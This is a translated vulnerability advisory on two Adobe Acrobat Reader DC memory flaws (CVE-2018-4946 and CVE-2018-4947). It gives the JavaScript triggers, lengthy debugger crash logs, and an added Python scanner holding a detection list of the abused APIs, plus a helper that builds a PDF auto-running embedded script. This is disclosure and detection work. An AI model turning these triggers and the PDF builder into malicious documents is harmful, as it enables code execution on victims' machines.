[SAFE-ID: JIWO-2024-3000] Author: 大猪 Published: [2022-02-25]
1. Overview
On May 15, Talos published details of newly discovered vulnerabilities in Adobe Acrobat Reader DC. Adobe Acrobat Reader is currently the most popular and feature-rich PDF reader; it has a very large user base, is the default PDF reader on most users' systems, and is also integrated into web browsers as a plugin for viewing PDFs. Exploiting these vulnerabilities therefore only requires tricking a user into visiting a malicious web page or sending them a specially crafted e-mail. [Source: jiwo.org]
2. Net.Discovery.queryServices remote code execution vulnerability (CVE-2018-4946)
2.1 Overview
When a PDF document is opened with Adobe Acrobat Reader DC version 2018.009.20044, specific JavaScript embedded in the PDF file can cause a pointer to a previously freed object to be reused. An attacker who uses this vulnerability to manipulate memory may be able to leak sensitive memory or execute arbitrary code. To trigger the vulnerability, the victim must open a malicious file or visit a malicious website.
2.2 CVSSv3 score
7.1 – CVSS:3.0/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H
2.3 Common Weakness Enumeration (CWE)
CWE-416: Use After Free
2.4 Vulnerability details
Adobe Acrobat Reader DC supports embedding JavaScript in PDFs, which allows interactive PDF forms to be read and used. This feature gives an attacker precise control over the memory layout and opens up an additional attack surface. Executing the following JavaScript in a PDF document affected by this vulnerability triggers a use-after-free condition:

try{this.Net.Discovery.queryServices( "", {} ); }catch(e){app.alert(e);}

With Page Heap enabled, this line of JavaScript causes the following crash:

eax=17a6acb8 ebx=29464fe0 ecx=29464fe0 edx=771f6c74 esi=2a064fd8 edi=2a064fd0
eip=520e2961 esp=0031f01c ebp=0031f02c iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
Annots!PlugInMain+0x9ea60:
520e2961 ff7318 push dword ptr [ebx+18h] ds:0023:29464ff8=????????
The memory pointed to by ebx has been freed, so the pointer is invalid and the dereference crashes. Using the Net.Discovery.queryServices method requires privileges; by default, calls to it are blocked for insufficient security permissions. If the document comes from a trusted source, however, the method is executed and the crash occurs. To trigger the crash, the first argument must be an invalid service name, which can simply be an empty string.

0:000> !heap -p -a eax
address 292c2fd0 found in
_DPH_HEAP_ROOT @ 191000
in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)
292215b0: 292c2fd0 30 - 292c2000 2000
6b258e89 verifier!AVrfDebugPageHeapAllocate+0x00000229
77276206 ntdll!RtlDebugAllocateHeap+0x00000030
7723a127 ntdll!RtlpAllocateHeap+0x000000c4
77205950 ntdll!RtlAllocateHeap+0x0000023a
62f8ed43 MSVCR120!malloc+0x00000049
55848b02 Annots!PlugInMain+0x00004c01
55848ab1 Annots!PlugInMain+0x00004bb0
55a4ba1b Annots!PlugInMain+0x00207b1a
558e1e29 Annots!PlugInMain+0x0009df28
558e2308 Annots!PlugInMain+0x0009e407
56b4267d EScript!mozilla::HashBytes+0x0004201b
56b275b6 EScript!mozilla::HashBytes+0x00026f54
56b217c2 EScript!mozilla::HashBytes+0x00021160
56b205f0 EScript!mozilla::HashBytes+0x0001ff8e
56b204fb EScript!mozilla::HashBytes+0x0001fe99
56b20442 EScript!mozilla::HashBytes+0x0001fde0
56b09e18 EScript!mozilla::HashBytes+0x000097b6
56b48697 EScript!mozilla::HashBytes+0x00048035
56b4841a EScript!mozilla::HashBytes+0x00047db8
56b47e8d EScript!mozilla::HashBytes+0x0004782b
56b46d7f EScript!mozilla::HashBytes+0x0004671d
56bb622c EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x0005f52d
6023b42f AcroRd32!AIDE::PixelPartInfo::operator=+0x000e3aaf
60179c7d AcroRd32!AIDE::PixelPartInfo::operator=+0x000222fd
601763b1 AcroRd32!AIDE::PixelPartInfo::operator=+0x0001ea31
5ffcd185 AcroRd32!AX_PDXlateToHostEx+0x00159618
5ffcd683 AcroRd32!AX_PDXlateToHostEx+0x00159b16
601799da AcroRd32!AIDE::PixelPartInfo::operator=+0x0002205a
5fc6426f AcroRd32!PDAlternatesGetCosObj+0x0001d51f
5fc2b14b AcroRd32!CTJPEGWriter::CTJPEGWriter+0x000b9c1b
5fba268b AcroRd32!CTJPEGWriter::CTJPEGWriter+0x0003115b
5fba1761 AcroRd32!CTJPEGWriter::CTJPEGWriter+0x00030231

We set a write-access breakpoint on the dword that holds the pointer which is ultimately dereferenced, so that we can trace where it comes from:

0:000> ba w 4 292c2ffc
0:000> dd 292c2ffc
0:000> g
Breakpoint 6 hit
eax=29d26fe0 ebx=29d26fe0 ecx=55a494c0 edx=771f6c74 esi=28a2cff8 edi=292c2fd0
eip=55a49408 esp=0018c9e4 ebp=0018ca0c iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
Annots!PlugInMain+0x205507:
55a49408 e86941e0ff call Annots!PlugInMain+0x9675 (5584d576)
0:000> dd 292c2ffc
292c2ffc 29d26fe0 ???????? ???????? ????????
0:000> !heap -p -a 29d26fe0
address 29d26fe0 found in
_DPH_HEAP_ROOT @ 191000
in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)
2a3221d4: 29d26fe0 1c - 29d26000 2000
6b258e89 verifier!AVrfDebugPageHeapAllocate+0x00000229
77276206 ntdll!RtlDebugAllocateHeap+0x00000030
7723a127 ntdll!RtlpAllocateHeap+0x000000c4
77205950 ntdll!RtlAllocateHeap+0x0000023a
62f8ed43 MSVCR120!malloc+0x00000049
55848b02 Annots!PlugInMain+0x00004c01
55848ab1 Annots!PlugInMain+0x00004bb0
558e22e7 Annots!PlugInMain+0x0009e3e6
56b4267d EScript!mozilla::HashBytes+0x0004201b
56b275b6 EScript!mozilla::HashBytes+0x00026f54
56b217c2 EScript!mozilla::HashBytes+0x00021160
56b205f0 EScript!mozilla::HashBytes+0x0001ff8e
56b204fb EScript!mozilla::HashBytes+0x0001fe99
56b20442 EScript!mozilla::HashBytes+0x0001fde0
56b09e18 EScript!mozilla::HashBytes+0x000097b6
56b48697 EScript!mozilla::HashBytes+0x00048035
56b4841a EScript!mozilla::HashBytes+0x00047db8
56b47e8d EScript!mozilla::HashBytes+0x0004782b
56b46d7f EScript!mozilla::HashBytes+0x0004671d
56bb622c EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x0005f52d
6023b42f AcroRd32!AIDE::PixelPartInfo::operator=+0x000e3aaf
60179c7d AcroRd32!AIDE::PixelPartInfo::operator=+0x000222fd
601763b1 AcroRd32!AIDE::PixelPartInfo::operator=+0x0001ea31
5ffcd185 AcroRd32!AX_PDXlateToHostEx+0x00159618
5ffcd683 AcroRd32!AX_PDXlateToHostEx+0x00159b16
601799da AcroRd32!AIDE::PixelPartInfo::operator=+0x0002205a
5fc6426f AcroRd32!PDAlternatesGetCosObj+0x0001d51f
5fc2b14b AcroRd32!CTJPEGWriter::CTJPEGWriter+0x000b9c1b
5fba268b AcroRd32!CTJPEGWriter::CTJPEGWriter+0x0003115b
5fba1761 AcroRd32!CTJPEGWriter::CTJPEGWriter+0x00030231
5fb860d4 AcroRd32!CTJPEGWriter::CTJPEGWriter+0x00014ba4
5fb85688 AcroRd32!CTJPEGWriter::CTJPEGWriter+0x00014158
This 0x1c-byte block is subsequently freed, but it is reused later, which causes the crash:

(c20.5e8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=17d2acb8 ebx=29d26fe0 ecx=29d26fe0 edx=771f6c74 esi=292c2fd8 edi=292c2fd0
eip=558e2961 esp=0018eee8 ebp=0018eef8 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
Annots!PlugInMain+0x9ea60:
558e2961 ff7318 push dword ptr [ebx+18h] ds:0023:29d26ff8=????????
0:000> dd ebx
29d26fe0 ???????? ???????? ???????? ????????
29d26ff0 ???????? ???????? ???????? ????????
29d27000 ???????? ???????? ???????? ????????
29d27010 ???????? ???????? ???????? ????????
29d27020 ???????? ???????? ???????? ????????
29d27030 ???????? ???????? ???????? ????????
29d27040 ???????? ???????? ???????? ????????
29d27050 ???????? ???????? ???????? ????????
With Page Heap disabled, this pointer dereference normally succeeds and leads to further memory corruption. With suitable manipulation of the memory layout this can be abused to achieve arbitrary code execution.
2.5 Timeline
January 23, 2018: vulnerability reported to the vendor
2.6 Credit
This vulnerability was discovered by Aleksandar Nikolic of Cisco Talos.
3. ANFancyAlertImpl remote code execution vulnerability (CVE-2018-4947)
3.1 Overview
When a PDF document is opened with Adobe Acrobat Reader DC version 2018.009.20044, specific JavaScript embedded in the PDF file can cause a pointer to a previously freed object to be reused. An attacker who uses this vulnerability to manipulate memory may be able to leak sensitive memory or execute arbitrary code. To trigger the vulnerability, the victim must open a malicious file or visit a malicious website.
3.2 CVSSv3 score
6.8 – CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H
3.3 Common Weakness Enumeration (CWE)
CWE-908: Use of Uninitialized Resource
3.4 Vulnerability details
Adobe Acrobat Reader DC supports embedding JavaScript in PDFs, which allows interactive PDF forms to be read and used. This feature gives an attacker precise control over the memory layout and opens up an additional attack surface. The following JavaScript triggers the issue:

var a = this.Collab.drivers; this.SetRSSMethods( ); this.ANFancyAlertImpl(this);

When ANFancyAlertImpl(this) is called, a memory object is allocated. The pointer to this object is subsequently passed to other functions, but the object itself is never initialized. As a result, the previous contents of that memory region are undefined, which leads to memory corruption and ultimately to the risk of arbitrary code execution.

(660.8f0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** WARNING: Unable to verify checksum for c:\Program Files\Adobe\Acrobat Reader DC\Reader\plug_ins\Annots.api
*** ERROR: Symbol file could not be found. Defaulted to export symbols for c:\Program Files\Adobe\Acrobat Reader DC\Reader\plug_ins\Annots.api -
eax=81818180 ebx=c0c0c0c0 ecx=c0c0c0c0 edx=c0c0c0c0 esi=c0c0c0c0 edi=36dbafe0
eip=645ff26d esp=001ac70c ebp=001ac738 iopl=0 nv up ei pl nz na po cy
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210203
MSVCR120!memcpy+0x2a:
645ff26d f3a4 rep movs byte ptr es:[edi],byte ptr [esi]
0:000> k
 # ChildEBP RetAddr
00 001ac710 7748e62e MSVCR120!memcpy+0x2a [f:\dd\vctools\crt\crtw32\string\i386\memcpy.asm @ 188]
WARNING: Stack unwind information not available. Following frames may be wrong.
01 001ac738 7748e5a2 Annots!PlugInMain+0xa72d
02 001ac760 7748e3c6 Annots!PlugInMain+0xa6a1
03 001ac770 776412e1 Annots!PlugInMain+0xa4c5
04 001ac780 774f7258 Annots!PlugInMain+0x1bd3e0
05 001ac7ac 570bd6b2 Annots!PlugInMain+0x73357
06 001ac81c 570c1c35 EScript!mozilla::HashBytes+0x2d050
07 001ac84c 5709387b EScript!mozilla::HashBytes+0x315d3
08 001ac8dc 570932df EScript!mozilla::HashBytes+0x3219
09 001ac8f8 570bd21d EScript!mozilla::HashBytes+0x2c7d
0a 001ac944 570bd1b0 EScript!mozilla::HashBytes+0x2cbbb
By stepping back through a few function calls we can find where the memcpy arguments come from:

0:000> bp Annots!PluginMain+0x1bd3db
breakpoint 0 redefined
0:000> g
Breakpoint 0 hit
eax=267eef94 ebx=00000000 ecx=0030c438 edx=77898090 esi=1f266fc0 edi=2902efb8
eip=776412dc esp=0030c414 ebp=0030c41c iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200246
Annots!PlugInMain+0x1bd3db:
776412dc e8cdd0e4ff call Annots!PlugInMain+0xa4ad (7748e3ae)
0:000> u eip-1
Annots!PlugInMain+0x1bd3da:
776412db 50 push eax
776412dc e8cdd0e4ff call Annots!PlugInMain+0xa4ad (7748e3ae)
776412e1 8b4508 mov eax,dword ptr [ebp+8]
776412e4 8be5 mov esp,ebp
776412e6 5d pop ebp
776412e7 c20400 ret 4
776412ea 55 push ebp
776412eb 8bec mov ebp,esp
0:000> dd poi(eax)
26a5efe8 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
26a5eff8 c0c0c0c0 c0c0c0c0 ???????? ????????
26a5f008 ???????? ???????? ???????? ????????
26a5f018 ???????? ???????? ???????? ????????
26a5f028 ???????? ???????? ???????? ????????
26a5f038 ???????? ???????? ???????? ????????
26a5f048 ???????? ???????? ???????? ????????
26a5f058 ???????? ???????? ???????? ????????
0:000> !heap -p -a poi(eax)
address 26a5efe8 found in
_DPH_HEAP_ROOT @ 61000
in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)
26954750: 26a5efb8 48 - 26a5e000 2000
6ac68e89 verifier!AVrfDebugPageHeapAllocate+0x00000229
77276206 ntdll!RtlDebugAllocateHeap+0x00000030
7723a127 ntdll!RtlpAllocateHeap+0x000000c4
77205950 ntdll!RtlAllocateHeap+0x0000023a
6326ed43 MSVCR120!malloc+0x00000049 [f:\dd\vctools\crt\crtw32\heap\malloc.c @ 92]
6326ee1c MSVCR120!operator new+0x0000001d [f:\dd\vctools\crt\crtw32\heap\new.cpp @ 59]
7748a048 Annots!PlugInMain+0x00006147
7748a00b Annots!PlugInMain+0x0000610a
7748daea Annots!PlugInMain+0x00009be9
774890a1 Annots!PlugInMain+0x000051a0
7748f546 Annots!PlugInMain+0x0000b645
774a5069 Annots!PlugInMain+0x00021168
7763d75e Annots!PlugInMain+0x001b985d
515db634 EScript!mozilla::HashBytes+0x0004afd2
515db51f EScript!mozilla::HashBytes+0x0004aebd
7763d6ab Annots!PlugInMain+0x001b97aa
774a5069 Annots!PlugInMain+0x00021168
7763d75e Annots!PlugInMain+0x001b985d
515db634 EScript!mozilla::HashBytes+0x0004afd2
515db51f EScript!mozilla::HashBytes+0x0004aebd
7763d6ab Annots!PlugInMain+0x001b97aa
774a5069 Annots!PlugInMain+0x00021168
774a4f71 Annots!PlugInMain+0x00021070
7762aaa2 Annots!PlugInMain+0x001a6ba1
7762aad8 Annots!PlugInMain+0x001a6bd7
77626588 Annots!PlugInMain+0x001a2687
7762af80 Annots!PlugInMain+0x001a707f
51f8ab90 AcroRd32!AIDE::PixelPartInfo::operator=+0x000e3210
515d267d EScript!mozilla::HashBytes+0x0004201b
515b75b6 EScript!mozilla::HashBytes+0x00026f54
515b17c2 EScript!mozilla::HashBytes+0x00021160
515b05f0 EScript!mozilla::HashBytes+0x0001ff8e
In the debug log above we break at Annots!PluginMain+0x1bd3db and find that eax, which is passed as an argument to the function call, points to a newly allocated and uninitialized buffer. With Page Heap enabled, the contents of the allocation are filled with 0xc0c0c0c0.

# set AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=AAAAAAAAAAAAAAAAAAAAAAAA....
# cdb "c:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "c:\Users\user\Desktop\js_memcpy_min.pdf"
Microsoft (R) Windows Debugger Version 10.0.15063.468 X86
Copyright (c) Microsoft Corporation. All rights reserved.
CommandLine: "c:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "c:\Users\user\Desktop\js_memcpy_min.pdf"
Symbol search path is: srv*
Executable search path is:
ModLoad: 013b0000 015d5000 AcroRd32.exe
ModLoad: 771b0000 772f2000 ntdll.dll
ModLoad: 75d80000 75e55000 C:\Windows\system32\kernel32.dll
ModLoad: 75340000 7538b000 C:\Windows\system32\KERNELBASE.dll
ModLoad: 75690000 75759000 C:\Windows\system32\USER32.dll
ModLoad: 75400000 7544e000 C:\Windows\system32\GDI32.dll
ModLoad: 75f50000 75f5a000 C:\Windows\system32\LPK.dll
ModLoad: 75450000 754ed000 C:\Windows\system32\USP10.dll
ModLoad: 758d0000 7597c000 C:\Windows\system32\msvcrt.dll
ModLoad: 75f60000 76001000 C:\Windows\system32\ADVAPI32.dll
ModLoad: 761b0000 761c9000 C:\Windows\SYSTEM32\sechost.dll
ModLoad: 75550000 755f2000 C:\Windows\system32\RPCRT4.dll
ModLoad: 75a40000 75a97000 C:\Windows\system32\SHLWAPI.dll
(8b0.3f8): Break instruction exception - code 80000003 (first chance)
eax=00000000 ebx=00000000 ecx=001bf42c edx=771f6c74 esi=fffffffe edi=00000000
eip=772505d9 esp=001bf448 ebp=001bf474 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
ntdll!LdrpDoDebuggerBreak+0x2c:
772505d9 cc int 3
0:000> g
ModLoad: 75e60000 75e7f000 C:\Windows\system32\IMM32.DLL
ModLoad: 753f0000 753f6000 C:\Windows\system32\NSI.dll
(8b0.3f8): C++ EH exception - code e06d7363 (first chance)
ModLoad: 74f60000 74fac000 C:\Windows\system32\apphelp.dll
ModLoad: 64a70000 64ac1000 c:\Program Files\Adobe\Acrobat Reader DC\Reader\sqlite.dll
(8b0.3f8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=046503d8 ebx=00000000 ecx=046503d8 edx=06672fc8 esi=03f75478 edi=0656ffe8
eip=41414141 esp=001bc14c ebp=001bc174 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210206
41414141 ?? ???
With Page Heap enabled, the crash output is as follows:

First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** WARNING: Unable to verify checksum for c:\Program Files\Adobe\Acrobat Reader DC\Reader\plug_ins\Annots.api
*** ERROR: Symbol file could not be found. Defaulted to export symbols for c:\Program Files\Adobe\Acrobat Reader DC\Reader\plug_ins\Annots.api -
eax=011716ce ebx=00000002 ecx=011716cc edx=011716cc esi=00000002 edi=37561000
eip=6326f26d esp=0016c6f0 ebp=0016c71c iopl=0 nv up ei pl nz ac po cy
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210213
MSVCR120!memcpy+0x2a:
6326f26d f3a4 rep movs byte ptr es:[edi],byte ptr [esi]
0:000> k
ChildEBP RetAddr
0016c6f4 7748e62e MSVCR120!memcpy+0x2a
WARNING: Stack unwind information not available. Following frames may be wrong.
0016c71c 7748e5a2 Annots!PlugInMain+0xa72d
0016c744 7748e3c6 Annots!PlugInMain+0xa6a1
0016c754 776412e1 Annots!PlugInMain+0xa4c5
0016c764 774f7258 Annots!PlugInMain+0x1bd3e0
*** WARNING: Unable to verify checksum for c:\Program Files\Adobe\Acrobat Reader DC\Reader\plug_ins\EScript.api
*** ERROR: Symbol file could not be found. Defaulted to export symbols for c:\Program Files\Adobe\Acrobat Reader DC\Reader\plug_ins\EScript.api -
0016c790 515bd6b2 Annots!PlugInMain+0x73357
0016c800 515c1c35 EScript!mozilla::HashBytes+0x2d050
0016c830 5159387b EScript!mozilla::HashBytes+0x315d3
0016c8c0 515932df EScript!mozilla::HashBytes+0x3219
0016c8dc 515bd21d EScript!mozilla::HashBytes+0x2c7d
0016c928 515bd1b0 EScript!mozilla::HashBytes+0x2cbbb
0016c944 515c1a3e EScript!mozilla::HashBytes+0x2cb4e
0016c960 515c19d5 EScript!mozilla::HashBytes+0x313dc
0016c990 515db61f EScript!mozilla::HashBytes+0x31373
0016c9e4 515db51f EScript!mozilla::HashBytes+0x4afbd
0016c9fc 7763d6c7 EScript!mozilla::HashBytes+0x4aebd
0016ca3c 774a5069 Annots!PlugInMain+0x1b97c6
0016ca5c 774a4f71 Annots!PlugInMain+0x21168
0016ca9c 7763d663 Annots!PlugInMain+0x21070
0016cadc 774a5069 Annots!PlugInMain+0x1b9762
0016cafc 7763d75e Annots!PlugInMain+0x21168
0016cb2c 515db634 Annots!PlugInMain+0x1b985d
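Both triggers above (sections 2.4 and 3.4) are plain JavaScript calls to Acrobat APIs that a document from an untrusted source has no business invoking, which makes them a usable triage indicator. The following Python script is an added example, not code from the advisory, Talos or Adobe: it inflates FlateDecode streams and flags PDFs whose embedded script references those APIs. It assumes the script is stored plainly or Flate-compressed rather than hex-encoded or otherwise obfuscated, and build_sample_pdf is a constructed fixture used only to exercise the scanner.

```python
import re
import zlib

# Acrobat JavaScript APIs named in this advisory: the privileged
# Net.Discovery.queryServices call (CVE-2018-4946) and the
# ANFancyAlertImpl call sequence (CVE-2018-4947).
SUSPICIOUS_APIS = (
    "Net.Discovery.queryServices",
    "ANFancyAlertImpl",
    "Collab.drivers",
    "SetRSSMethods",
)

# A PDF stream body sits between "stream" + EOL and EOL + "endstream".
STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.DOTALL)


def decoded_views(pdf: bytes) -> list:
    """Return the raw file plus every FlateDecode stream inflated, so that
    JavaScript stored in a compressed object stream becomes searchable."""
    views = [pdf]
    for match in STREAM_RE.finditer(pdf):
        try:
            views.append(zlib.decompress(match.group(1)))
        except zlib.error:
            continue  # not Flate data; the raw view already covers it
    return views


def find_suspicious_calls(pdf: bytes) -> set:
    """Names from SUSPICIOUS_APIS found anywhere in the PDF, plain or
    inflated. Assumes the script is not hex- or escape-obfuscated."""
    hits = set()
    for view in decoded_views(pdf):
        text = view.decode("latin-1")  # never fails; PDF is a byte format
        hits.update(api for api in SUSPICIOUS_APIS if api in text)
    return hits


def build_sample_pdf(js: str) -> bytes:
    """Constructed minimal PDF fixture (not a file from the advisory) whose
    /OpenAction runs `js` from a FlateDecode stream; exists only to give
    the scanner realistic input to inflate and search."""
    body = zlib.compress(js.encode("latin-1"))
    header = (
        b"%PDF-1.7\n"
        b"1 0 obj << /Type /Catalog /OpenAction 2 0 R >> endobj\n"
        b"2 0 obj << /S /JavaScript /JS 3 0 R >> endobj\n"
        b"3 0 obj << /Length " + str(len(body)).encode() + b" /Filter /FlateDecode >>\n"
    )
    return header + b"stream\n" + body + b"\nendstream\nendobj\ntrailer << /Root 1 0 R >>\n%%EOF\n"
```

Because only the inflated view contains readable text, a scanner that greps the raw file without decompressing streams would miss both triggers.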
3.5 Timeline
January 23, 2018: vulnerability reported to the vendor
3.6 Credit
This vulnerability was discovered by Aleksandar Nikolic of Cisco Talos.
4. Known vulnerable versions
Adobe Acrobat Reader DC 2018.009.20044